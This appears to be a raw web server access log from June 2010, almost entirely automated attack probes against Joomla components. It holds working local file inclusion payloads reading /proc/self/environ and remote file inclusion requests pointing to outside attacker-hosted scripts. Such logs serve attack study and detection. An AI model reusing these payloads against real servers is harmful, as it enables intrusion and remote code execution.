209.160.32.228 - - [13/Jun/2010:01:20:29 -0500] "GET //localhost/[path]/pda/pda_projects.php?offset=http://97.74.238.165/ic/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
209.160.32.228 - - [13/Jun/2010:01:20:29 -0500] "GET /logs//localhost/[path]/pda/pda_projects.php?offset=http://97.74.238.165/ic/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
209.160.32.228 - - [13/Jun/2010:01:20:29 -0500] "GET /logs/access_log.1272067200//localhost/[path]/pda/pda_projects.php?offset=http://97.74.238.165/ic/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
208.116.46.58 - - [13/Jun/2010:01:20:59 -0500] "GET /?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
208.116.46.58 - - [13/Jun/2010:01:21:00 -0500] "GET /logs/?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""oi"
208.116.46.58 - - [13/Jun/2010:01:21:00 -0500] "GET /logs/access_log.1274572800/?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
72.18.137.210 - - [13/Jun/2010:01:21:06 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
72.18.137.210 - - [13/Jun/2010:01:21:06 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.18.137.210 - - [13/Jun/2010:01:21:07 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
119.235.18.119 - - [13/Jun/2010:01:21:44 -0500] "GET /?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
119.235.18.119 - - [13/Jun/2010:01:21:45 -0500] "GET /logs/?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""oi"
119.235.18.119 - - [13/Jun/2010:01:21:49 -0500] "GET /logs/access_log.1271462400/?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
89.110.131.43 - - [13/Jun/2010:01:22:09 -0500] "GET /?option=com_econtent&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
89.110.131.43 - - [13/Jun/2010:01:22:09 -0500] "GET /logs/?option=com_econtent&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""oi"
89.110.131.43 - - [13/Jun/2010:01:22:10 -0500] "GET /logs/access_log.1271462400/?option=com_econtent&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
208.116.46.58 - - [13/Jun/2010:01:22:42 -0500] "GET /?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
208.116.46.58 - - [13/Jun/2010:01:22:42 -0500] "GET /logs/?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""oi"
208.116.46.58 - - [13/Jun/2010:01:22:43 -0500] "GET /logs/access_log.1274572800/?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
208.116.46.58 - - [13/Jun/2010:01:23:03 -0500] "GET /?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
208.116.46.58 - - [13/Jun/2010:01:23:04 -0500] "GET /logs/?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""oi"
208.116.46.58 - - [13/Jun/2010:01:23:04 -0500] "GET /logs/access_log.1274572800/?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
72.18.137.210 - - [13/Jun/2010:01:23:27 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
209.126.254.57 - - [13/Jun/2010:01:23:31 -0500] "GET /lfi../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 352 "-""oi"
209.126.254.57 - - [13/Jun/2010:01:23:31 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 357 "-""oi"
209.126.254.57 - - [13/Jun/2010:01:23:31 -0500] "GET /logs/access_log.1272240000/lfi../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 379 "-""oi"
209.126.254.57 - - [13/Jun/2010:01:23:37 -0500] "GET /logs/access_log.1271635200/lfi../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 379 "-""oi"
209.126.254.57 - - [13/Jun/2010:01:23:38 -0500] "GET /logs/access_log.1271462400/lfi../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 379 "-""oi"
209.126.254.57 - - [13/Jun/2010:01:23:54 -0500] "GET /logs/access_log.1272067200/lfi../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 379 "-""oi"
119.235.18.119 - - [13/Jun/2010:01:24:01 -0500] "GET /?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
209.126.254.57 - - [13/Jun/2010:01:24:01 -0500] "GET /lfi../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 352 "-""oi"
209.126.254.57 - - [13/Jun/2010:01:24:01 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 357 "-""oi"
209.126.254.57 - - [13/Jun/2010:01:24:01 -0500] "GET /logs/access_log.1274572800/lfi../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 379 "-""oi"
209.126.254.57 - - [13/Jun/2010:01:24:02 -0500] "GET /logs/access_log.1274832000/lfi../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 379 "-""oi"
119.235.18.119 - - [13/Jun/2010:01:24:02 -0500] "GET /logs/?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""oi"
119.235.18.119 - - [13/Jun/2010:01:24:03 -0500] "GET /logs/access_log.1274572800/?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
209.126.254.57 - - [13/Jun/2010:01:26:32 -0500] "GET /lfi../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 352 "-""oi"
209.126.254.57 - - [13/Jun/2010:01:26:32 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 357 "-""oi"
209.126.254.57 - - [13/Jun/2010:01:26:32 -0500] "GET /logs/access_log.1273363200/lfi../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 379 "-""oi"
209.126.254.57 - - [13/Jun/2010:01:27:03 -0500] "GET /logs/access_log.1274572800/lfi../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 379 "-""oi"
67.195.112.180 - - [13/Jun/2010:01:27:45 -0500] "GET /logs/access_log.1275177600 HTTP/1.0" 200 870367 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.126.254.57 - - [13/Jun/2010:01:28:07 -0500] "GET /logs/access_log.1274832000/lfi../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 379 "-""oi"
67.195.112.180 - - [13/Jun/2010:01:29:06 -0500] "GET /logs/access_log.1223424000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.18.137.210 - - [13/Jun/2010:01:29:11 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
72.18.137.210 - - [13/Jun/2010:01:29:11 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.18.137.210 - - [13/Jun/2010:01:29:11 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.18.137.210 - - [13/Jun/2010:01:31:56 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
94.23.197.156 - - [13/Jun/2010:01:31:58 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
119.235.18.119 - - [13/Jun/2010:01:32:22 -0500] "GET /?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
119.235.18.119 - - [13/Jun/2010:01:32:22 -0500] "GET /logs/?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""oi"
119.235.18.119 - - [13/Jun/2010:01:32:23 -0500] "GET /logs/access_log.1274572800/?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
94.23.197.156 - - [13/Jun/2010:01:33:13 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
72.18.137.210 - - [13/Jun/2010:01:33:15 -0500] "GET /logs/access_log.1273622400//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
72.18.137.210 - - [13/Jun/2010:01:33:17 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.18.137.210 - - [13/Jun/2010:01:33:17 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
122.252.7.141 - - [13/Jun/2010:01:33:27 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
67.195.112.180 - - [13/Jun/2010:01:34:00 -0500] "GET /costume/costume1.htm HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
188.40.178.145 - - [13/Jun/2010:01:34:02 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://mgquadro.fileave.com/fz1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
188.40.178.145 - - [13/Jun/2010:01:34:02 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://mgquadro.fileave.com/fz1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
188.40.178.145 - - [13/Jun/2010:01:34:02 -0500] "GET /logs/access_log.1272067200//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://mgquadro.fileave.com/fz1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
119.235.18.70 - - [13/Jun/2010:01:34:22 -0500] "GET /?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
119.235.18.70 - - [13/Jun/2010:01:34:24 -0500] "GET /logs/?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""oi"
94.23.197.156 - - [13/Jun/2010:01:34:25 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:01:34:25 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
119.235.18.70 - - [13/Jun/2010:01:34:30 -0500] "GET /logs/access_log.1271721600/?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
122.252.7.141 - - [13/Jun/2010:01:34:45 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
188.40.178.145 - - [13/Jun/2010:01:34:49 -0500] "GET /logs/access_log.1272240000//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://mgquadro.fileave.com/fz1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
94.23.197.156 - - [13/Jun/2010:01:34:53 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:01:34:54 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
70.85.9.58 - - [13/Jun/2010:01:34:57 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://fr.webmaster-rank.info/header/myid.jpg? HTTP/1.1" 404 365 "-""libwww-perl/5.826"
70.85.9.58 - - [13/Jun/2010:01:34:57 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://fr.webmaster-rank.info/header/myid.jpg? HTTP/1.1" 404 360 "-""libwww-perl/5.826"
94.23.197.156 - - [13/Jun/2010:01:35:14 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:01:35:14 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:35:21 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:35:24 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:35:38 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:35:38 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:35:43 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:35:44 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:01:35:44 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:01:35:44 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:35:46 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:35:47 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:35:47 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:35:48 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:35:48 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:35:49 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:35:49 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:35:54 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:35:55 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:35:55 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
72.18.137.210 - - [13/Jun/2010:01:35:56 -0500] "GET /logs/access_log.1273622400//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
72.18.137.210 - - [13/Jun/2010:01:35:56 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.18.137.210 - - [13/Jun/2010:01:35:56 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
122.252.7.141 - - [13/Jun/2010:01:36:05 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
122.252.7.141 - - [13/Jun/2010:01:36:06 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
94.23.6.211 - - [13/Jun/2010:01:36:12 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:36:13 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
122.252.7.141 - - [13/Jun/2010:01:36:24 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
122.252.7.141 - - [13/Jun/2010:01:36:25 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
122.252.7.141 - - [13/Jun/2010:01:36:37 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
122.252.7.141 - - [13/Jun/2010:01:36:38 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
62.44.82.61 - - [13/Jun/2010:01:36:43 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pro-gaming.dk/fmkfoto/components/com_imagebrowser/pdf? HTTP/1.1" 404 351 "-""Mozilla/5.0"
62.44.82.61 - - [13/Jun/2010:01:36:43 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pro-gaming.dk/fmkfoto/components/com_imagebrowser/pdf? HTTP/1.1" 404 356 "-""Mozilla/5.0"
62.44.82.61 - - [13/Jun/2010:01:36:43 -0500] "GET /logs/access_log.1271548800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pro-gaming.dk/fmkfoto/components/com_imagebrowser/pdf? HTTP/1.1" 404 378 "-""Mozilla/5.0"
94.23.6.211 - - [13/Jun/2010:01:37:00 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:37:00 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:37:09 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:37:23 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:37:23 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:37:35 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:37:35 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:37:36 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:37:37 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:37:58 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:37:58 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:37:58 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:37:58 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:37:58 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:37:59 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:37:59 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:37:59 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:37:59 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:37:59 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:37:59 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:37:59 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
67.210.109.185 - - [13/Jun/2010:01:40:05 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
67.210.109.185 - - [13/Jun/2010:01:40:05 -0500] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""oi"
67.210.109.185 - - [13/Jun/2010:01:40:06 -0500] "GET /logs/access_log.1274572800/?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
94.23.197.156 - - [13/Jun/2010:01:41:17 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:01:41:17 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:01:41:23 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:01:41:23 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
209.160.32.228 - - [13/Jun/2010:01:42:09 -0500] "GET /logs/access_log.1271548800/write_comment_update.php?board_skin_path=http://97.74.238.165/ic/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
209.160.32.228 - - [13/Jun/2010:01:42:09 -0500] "GET /write_comment_update.php?board_skin_path=http://97.74.238.165/ic/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
209.160.32.228 - - [13/Jun/2010:01:42:09 -0500] "GET /logs/write_comment_update.php?board_skin_path=http://97.74.238.165/ic/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
219.240.36.36 - - [13/Jun/2010:01:42:49 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
67.210.109.185 - - [13/Jun/2010:01:43:04 -0500] "GET /logs/access_log.1274832000/?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
67.205.85.5 - - [13/Jun/2010:01:43:22 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:01:43:22 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
94.23.197.156 - - [13/Jun/2010:01:43:33 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
